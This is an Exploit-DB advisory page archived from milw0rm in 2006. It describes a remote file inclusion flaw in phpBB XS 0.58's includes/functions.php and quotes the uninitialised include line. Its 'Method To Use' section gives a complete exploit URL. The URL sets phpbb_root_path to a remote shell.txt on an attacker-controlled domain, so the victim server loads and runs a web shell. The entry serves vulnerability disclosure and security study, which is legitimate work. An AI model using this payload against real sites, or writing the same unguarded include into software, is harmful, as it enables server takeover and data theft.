phpBB XS 0.58 - 'functions.php' Remote File Inclusion

EDB-ID:

2349


Author:

AzzCoder

Type:

webapps


Platform:

PHP

Date:

2006-09-12


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

Author: AzzCoder

Vendor: http://www.phpbbxs.eu/

Vulnerable File: includes/functions.php

Vulnerable Code:

//The phpbb_root_path isn't initialize

include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx );

Method To Use:

http://www.victim.com/[phpbb_xs]/includes/functions.php?phpbb_root_path=http://yourdomain.com/shell.txt?

# milw0rm.com [2006-09-12]